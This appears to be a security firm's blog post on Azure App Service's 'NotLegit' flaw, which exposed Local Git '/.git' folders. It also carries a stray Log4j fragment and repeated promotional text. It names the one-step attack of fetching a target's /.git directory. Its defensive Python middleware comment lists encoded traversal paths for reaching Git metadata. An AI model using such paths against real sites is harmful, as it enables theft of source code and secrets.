"Clients should consider the general availability of exploit code and scanning capabilities to be a simple and present threat to their environments at this time," MSTIC warned. "Because of the massive number of vulnerable software and services, as well as the rapid pace of progress, remediation is projected to take a long time, needing continued, long-term attention."

The news comes as the US Federal Trade Commission (FTC) issued a statement warning that it "intends to use its full legal authority to pursue companies that fail to take appropriate steps to safeguard customer data from exposure as a result of Log4j, or equivalent known vulnerabilities in the future."

For many years, Airzero Sec's cybersecurity experts have worked on a variety of projects for a number of well-known companies. Take advantage of our previous experience, whether it is to help you get there or to carry out technical tests. If you have any doubts about the above topic, don't hesitate to contact us. Airzero Cloud will be your digital companion.


The security vulnerability could reveal passwords and access tokens, as well as blueprints of the internal infrastructure, and help attackers find software vulnerabilities. Researchers said that Microsoft Azure App Service had a four-year-old vulnerability that could expose the source code of web applications written in PHP, Python, Ruby, or Node that were deployed using Local Git. According to an analysis by Wiz, the bug was almost certainly exploited in the wild as a zero-day. The company named the vulnerability "NotLegit" and stated that it has existed since September 2017.

Azure App Service is a cloud-based platform for hosting websites and web applications. Local Git lets developers initialize a local Git repository inside the Azure App Service container and deploy code directly to the server. Once deployed, the application is reachable by anyone on the Internet under the *.azurewebsites.net domain.

The problem arises because, when Local Git is used on unpatched systems, the Git folder is created and left publicly accessible: it sits in the /home/site/wwwroot directory, which anyone can reach. According to the company, this has serious security consequences. "In addition to the case of the source including secrets such as passwords and access tokens, leaked source code is often used for more complex attacks, such as collecting information about the R&D department, learning about the internal infrastructure and finding software vulnerabilities," the researchers stated in a publication this week. "Finding susceptibilities in software is much more comfortable when the source code is available." They added, "Basically, all an opposing actor had to do was find the '/.git' directory of the target application and get the source code."

Botched Mitigation

Microsoft initially deployed a mitigation in the form of a "web.config" file added to the Git folder within the public directory, which restricted public access; however, this turned out to be an incomplete fix. According to Wiz, "only Microsoft's IIS web server handles web.config files. However, if you use PHP, Ruby, Python, or Node...these programming languages are deployed with different web servers that do not handle web.config files, leaving them unaffected by the mitigation and thus completely vulnerable."
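Because a web.config is only honoured by IIS, a non-IIS app served from the same web root needs the block at a layer that is actually in the request path. As an added example (not Microsoft's or Wiz's code; the middleware, the demo app and the request driver are constructed), a plain WSGI wrapper that refuses any request whose normalized path reaches a Git metadata entry, regardless of which Python server fronts the app:

```python
from urllib.parse import unquote

# Repository metadata that must never be served from the web root.
BLOCKED = {".git", ".gitignore", ".gitattributes", ".gitmodules"}

def reaches_git_metadata(path):
    """True if any segment of the decoded, normalized path names Git metadata.
    Double-decoding and backslash folding catch encoded or traversal variants
    such as '/%2E%67it/config' or '/assets/..%2F.git/HEAD'."""
    decoded = unquote(unquote(path))
    segments = [seg for seg in decoded.replace("\\", "/").split("/") if seg]
    return any(seg.lower() in BLOCKED for seg in segments)

class DenyGitMiddleware:
    """WSGI middleware: answer 404 (not 403, which would confirm existence)
    for Git metadata paths and pass everything else to the wrapped app."""
    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        if reaches_git_metadata(environ.get("PATH_INFO", "")):
            start_response("404 Not Found", [("Content-Type", "text/plain")])
            return [b"not found"]
        return self.app(environ, start_response)

def hello_app(environ, start_response):
    """Stand-in for the deployed application (constructed)."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"hello"]

def request(app, path):
    """Minimal in-process WSGI driver (constructed): returns (status, body)."""
    captured = {}
    def start_response(status, headers):
        captured["status"] = status
    body = b"".join(app({"PATH_INFO": path, "REQUEST_METHOD": "GET"}, start_response))
    return captured["status"], body

app = DenyGitMiddleware(hello_app)
```

The middleware is defence in depth only: the repository should not sit under the served directory in the first place, and the same check belongs in the front-end server's configuration where one exists.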

Wiz reported the lingering bug to Microsoft in October and was awarded a $7,500 bounty for the discovery; the computing giant distributed fixes to affected users via email between December 7 and 15.

Likely Exploited in the Wild

Git folders are frequently revealed by mistake due to misconfiguration, and as a result, cybercriminals are on the lookout for them, researchers warned.

"An exposed Git folder is a typical security flaw that users commit without even recognizing it," they wrote. "Malicious actors are always searching the internet for exposed Git folders from which to steal secrets and intellectual property."

Wiz set up a vulnerable Azure App Service application and attached it to an unused domain to see if it could be exploited.

"We patiently paused to see if anyone tried to access the Git files," they wrote. "Within four days of deploying, we were unsurprised to see various requests for the Git folder from unknown actors... this exploitation approach is extremely simple, common, and actively exploited."

According to Wiz, the following users should assess the potential risk and ensure that their systems are up to date:

  • Users who deployed code via FTP, Web Deploy, or Bash/SSH, so that files already existed in the web app before any Git deployment.
  • Users who relied on Local Git in the web app.
  • Users who subsequently used the git clone command to publish updates.

"Because the security flaw was in an Azure service, cloud users were exposed on a large scale, and without their knowledge or control," researchers wrote.

Airzero Sec's cybersecurity consulting specialists have worked on various projects for a number of well-known corporations for years. Use this experience as needed, whether to help you get there or to carry out technical checks. If you have any doubts about the above topic, contact us. Airzero Sec will be your digital partner.
